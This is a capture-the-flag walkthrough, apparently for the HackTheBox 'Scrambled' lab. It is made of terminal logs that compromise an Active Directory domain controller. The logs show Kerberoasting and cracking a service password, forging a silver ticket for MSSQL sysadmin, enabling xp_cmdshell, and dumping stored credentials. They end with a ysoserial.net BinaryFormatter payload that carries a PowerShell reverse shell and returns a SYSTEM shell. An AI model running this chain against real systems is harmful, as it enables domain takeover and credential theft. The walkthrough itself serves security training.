┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nmap 10.129.161.177 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 09:54 EDT
Nmap scan report for 10.129.161.177
Host is up (0.10s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4411/tcp open found
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49701/tcp open unknown
49710/tcp open unknown
49736/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 40.01 seconds
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# dirsearch -u http://10.129.161.177/ -x 403 404
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Scrambled/reports/http_10.129.161.177/__25-10-12_09-45-25.txt
Target: http://10.129.161.177/
[09:45:25] Starting:
[09:45:45] 301 - 152B - /assets -> http://10.129.161.177/assets/
[09:46:01] 301 - 152B - /images -> http://10.129.161.177/images/
[09:46:09] 200 - 2KB - /passwords.html
[09:46:19] 200 - 2KB - /support.html
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# curl http://10.129.161.177/passwords.html
<!DOCTYPE HTML>
<html>
<head>
<title>Password Resets</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<link rel="stylesheet" href="assets/css/main.css" />
<noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">
<!-- Wrapper -->
<div id="wrapper">
<!-- Nav -->
<nav id="nav">
<ul>
<li><a href="index.html">Home</a></li>
<li><a href="#">Reports</a></li>
<li><a href="support.html" class="active">IT Services</a></li>
</ul>
</nav>
<!-- Main -->
<div id="main">
<!-- Content -->
<section id="content" class="main">
<!-- Text -->
<section>
<h2><strong>Password Resets</strong></h2>
<p>
Our self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password.
If no one is available please leave a message stating your username and we will reset your password to be the same as the username.
</p>
<hr />
</section>
<br />
</section>
</div>
</div>
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrollex.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/browser.min.js"></script>
<script src="assets/js/breakpoints.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="assets/js/main.js"></script>
</body>
</html>
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'guest' -p '' --generate-hosts-file hosts
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [-] scrm.local\guest: STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat hosts
10.129.161.177 DC1.scrm.local scrm.local DC1
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'guest' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.161.177 445 DC1 [-] scrm.local\guest: STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = SCRM.LOCAL
[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
admin_server = dc1.scrm.local
default_domain = scrm.local
}
[domain_realm]
.scrm.local = SCRM.LOCAL
scrm.local = SCRM.LOCAL
We obtained the username ksimpson. Given the password-reset notice on the site (passwords are reset to match the username), a likely credential is ksimpson:ksimpson. Note the nxc banner reports NTLM:False and the guest attempt returned STATUS_NOT_SUPPORTED: NTLM is disabled on this domain, so every tool must authenticate with Kerberos (-k), which is why the hosts entry and krb5.conf were generated first.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k --generate-tgt ksimpson
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.161.177 445 DC1 [+] TGT saved to: ksimpson.ccache
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the TGT: export KRB5CCNAME=ksimpson.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=ksimpson.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# bloodhound-ce-python -c All -k -no-pass -u ksimpson -d scrm.local -ns 10.129.161.177 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: scrm.local
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Testing resolved hostname connectivity dead:beef::5de5:607d:e051:d074
INFO: Trying LDAP connection to dead:beef::5de5:607d:e051:d074
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Testing resolved hostname connectivity dead:beef::5de5:607d:e051:d074
INFO: Trying LDAP connection to dead:beef::5de5:607d:e051:d074
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 62 groups
INFO: Found 6 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS01.scrm.local
INFO: Querying computer: DC1.scrm.local
INFO: Done in 00M 16S
INFO: Compressing output into 20251012101155_bloodhound.zip
Nothing useful in the BloodHound data.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k --shares
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.161.177 445 DC1 [*] Enumerated shares
SMB 10.129.161.177 445 DC1 Share Permissions Remark
SMB 10.129.161.177 445 DC1 ----- ----------- ------
SMB 10.129.161.177 445 DC1 ADMIN$ Remote Admin
SMB 10.129.161.177 445 DC1 C$ Default share
SMB 10.129.161.177 445 DC1 HR
SMB 10.129.161.177 445 DC1 IPC$ READ Remote IPC
SMB 10.129.161.177 445 DC1 IT
SMB 10.129.161.177 445 DC1 NETLOGON READ Logon server share
SMB 10.129.161.177 445 DC1 Public READ
SMB 10.129.161.177 445 DC1 Sales
SMB 10.129.161.177 445 DC1 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# smbclient //DC1.scrm.local/Public -k --no-pass
WARNING: The option -k|--kerberos is deprecated!
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-smbclient -k -no-pass DC1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
#
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
Here impacket-smbclient connects, while Samba's smbclient does not: its -k flag is deprecated and the SPNEGO negotiation failed to find a usable mechtype. Impacket is the reliable choice. (On recent Samba the replacement is --use-kerberos=required together with --use-krb5-ccache=<ccache file> rather than -k.)
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-smbclient -k -no-pass DC1.scrm.local
# use Public
# ls
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 .
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 ..
-rw-rw-rw- 630106 Fri Nov 5 13:45:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
The port scan already showed MSSQL on 1433. Trying to log in with impacket-mssqlclient as ksimpson fails:
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local/ksimpson@DC1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[-] ERROR(DC1): Line 1: Login failed for user 'SCRM\ksimpson'.
Kerberoast: impacket-GetUserSPNs lists the accounts that have an SPN and, with -request, obtains a service ticket for each of them. The TGS-REP is encrypted with the service account's key, so the ticket can be cracked offline.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-GetUserSPNs scrm.local/ksimpson -k -no-pass -dc-host dc1.scrm.local -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2025-10-12 09:40:50.336768
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2025-10-12 09:40:50.336768
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eacf9f45aeff169f5ed5199c1962de81$278329f376dd6e3a0e00e41937c7f374a88ccaa3254472655d82bb1081032c2144f0894ffdc58df7dad1d6d93291ba774695bf5dfefc036431aec9e45f552827e5221d01b0c4a45a72058694c4bc1cf6459d9a6b486fbe6cdf0bbd32f241cc029aaf1384118ccab253ef33b30222c856a902e84fa3eb56621a9998355547a0ff3e5690a74c898ffc671f84b2e0ebcf7e847503d72195e5c6c2fc3a31d624122c3e853fbee4e40e56fb49ba095a63102258984ab634ab79904ab19fbc7ed6f336e21c969a30de669d6a7ec81cb734dad4eeb78ff191b23eb4137eb330ef3e6ad8fcdc7b1b139fa15f0702565ccc9 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
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eacf9f45aeff169f5ed5199c1962de81$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:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$e...377227
Time.Started.....: Sun Oct 12 23:07:31 2025 (1 sec)
Time.Estimated...: Sun Oct 12 23:07:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 15380.8 kH/s (6.33ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 49c Util: 28% Core:1890MHz Mem:8000MHz Bus:8
The hash cracks offline with hashcat (mode 13100, rockyou.txt) in about a second, giving the password of the sqlsvc service account: Pegasus60.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'sqlsvc' -p 'Pegasus60' -k --generate-tgt sqlsvc
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.161.177 445 DC1 [+] TGT saved to: sqlsvc.ccache
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the TGT: export KRB5CCNAME=sqlsvc.ccache
This account still cannot log in to MSSQL:
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local\sqlsvc@10.129.161.177 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
KDC_ERR_S_PRINCIPAL_UNKNOWN means the KDC has no account holding the SPN that was requested: the target was given as an IP address, so the SPN derived from it does not match the MSSQLSvc/dc1.scrm.local:1433 SPN that GetUserSPNs returned. Instead of asking the KDC for a ticket at all, we can forge one: a service ticket for MSSQLSvc is encrypted with sqlsvc's key, which we now hold, so a silver ticket can be built for any user we like, including one the SQL Server will treat as an administrator. Two things are needed:
# the NT hash of the service account
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# echo -n 'Pegasus60' | iconv -f UTF-8 -t UTF-16LE | openssl md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05
# the domain SID
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc ldap 10.129.161.177 -u 'sqlsvc' -p 'Pegasus60' -k --get-sid
LDAP 10.129.161.177 389 DC1 [*] None (name:DC1) (domain:scrm.local) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.161.177 389 DC1 [+] scrm.local\sqlsvc:Pegasus60
LDAP 10.129.161.177 389 DC1 Domain SID S-1-5-21-2743207045-1827831105-2542523200
# forge the silver ticket with impacket-ticketer
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/DC1.SCRM.LOCAL:1433 sqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/sqlsvc
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local/sqlsvc@dc1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
SQL (SCRM\administrator dbo@master)> select is_srvrolemember('sysadmin')
-
1
The query returns 1, so the session is sysadmin. The prompt shows SCRM\administrator even though the ticket was forged for sqlsvc because ticketer fills the PAC with RID 500 by default (the -user-id option), and SQL Server resolves that SID to the built-in Administrator. Standard next step: enable xp_cmdshell.
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
Five databases; ScrambleHR is the custom one. List its tables:
SQL (SCRM\administrator dbo@master)> use ScrambleHR
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ScrambleHR dbo Employees b'BASE TABLE'
ScrambleHR dbo UserImport b'BASE TABLE'
ScrambleHR dbo Timesheets b'BASE TABLE'
Dump the contents of each table:
SQL (SCRM\administrator dbo@ScrambleHR)> select * from Employees
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
SQL (SCRM\administrator dbo@ScrambleHR)> select * from userimport
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@ScrambleHR)> select * from Timesheets
EmployeeID TimeStart TimeEnd
---------- --------- -------
The UserImport table holds a credential: MiscSvc / ScrambledEggs9900.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -k
SMB dc1.scrm.local 445 dc1 [*] x64 (name:dc1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc1.scrm.local 445 dc1 [+] scrm.local\MiscSvc:ScrambledEggs9900
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -k --generate-tgt miscsvc
SMB dc1.scrm.local 445 dc1 [*] x64 (name:dc1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc1.scrm.local 445 dc1 [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB dc1.scrm.local 445 dc1 [+] TGT saved to: miscsvc.ccache
SMB dc1.scrm.local 445 dc1 [+] Run the following command to use the TGT: export KRB5CCNAME=miscsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=miscsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# klist
Ticket cache: FILE:miscsvc.ccache
Default principal: MiscSvc@SCRM.LOCAL
Valid starting Expires Service principal
10/12/2025 11:56:47 10/12/2025 21:56:47 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 10/13/2025 11:56:45
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# evil-winrm -i dc1.scrm.local -r scrm.local
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\miscsvc\Documents> whoami
scrm\miscsvc
miscsvc
This user is also a member of the ITShare group, so it can read the IT share:
*Evil-WinRM* PS C:\shares\IT> tree /F /A
Folder PATH listing
Volume serial number is 5805-B4B6
C:.
+---Apps
| \---Sales Order Client
| ScrambleClient.exe
| ScrambleLib.dll
|
+---Logs
\---Reports
Download both files:
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> dir
Directory: C:\shares\IT\apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2021 8:52 PM 86528 ScrambleClient.exe
-a---- 11/5/2021 8:52 PM 19456 ScrambleLib.dll
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> download ScrambleClient.exe
Info: Downloading C:\shares\IT\apps\Sales Order Client\ScrambleClient.exe to ScrambleClient.exe
Info: Download successful!
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> download ScrambleLib.dll
Info: Downloading C:\shares\IT\apps\Sales Order Client\ScrambleLib.dll to ScrambleLib.dll
Info: Download successful!
Running the exe gives the Sales Order client referenced on the web site. After pointing it at the server and adding the hosts entry, none of the accounts gathered so far can log in. Decompiling with dotPeek, exporting the project and reviewing the code (with AI assistance) quickly turns up three issues, among them a built-in "master" user scrmdev that logs straight in, and the fact that orders uploaded to the service on port 4411 are deserialized with BinaryFormatter.
First, download ysoserial.net:
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip
Generate the BinaryFormatter deserialization payload (AxHostState gadget) wrapping a base64-encoded PowerShell reverse-shell command:
PS C:\Users\Administrator\Desktop\s\ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9\Release> .\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "powershell -e 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"
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
# start the listener
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
# send the payload as an UPLOAD_ORDER (the ERROR_GENERAL reply below is expected: BinaryFormatter runs the gadget chain inside Deserialize() before the cast to ScrambleLib.SalesOrder fails, so the callback still fires)
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nc 10.129.161.177 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;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
ERROR_GENERAL;Error deserializing sales order: Unable to cast object of type 'State' to type 'ScrambleLib.SalesOrder'.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.58] from (UNKNOWN) [10.129.161.177] 52769
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>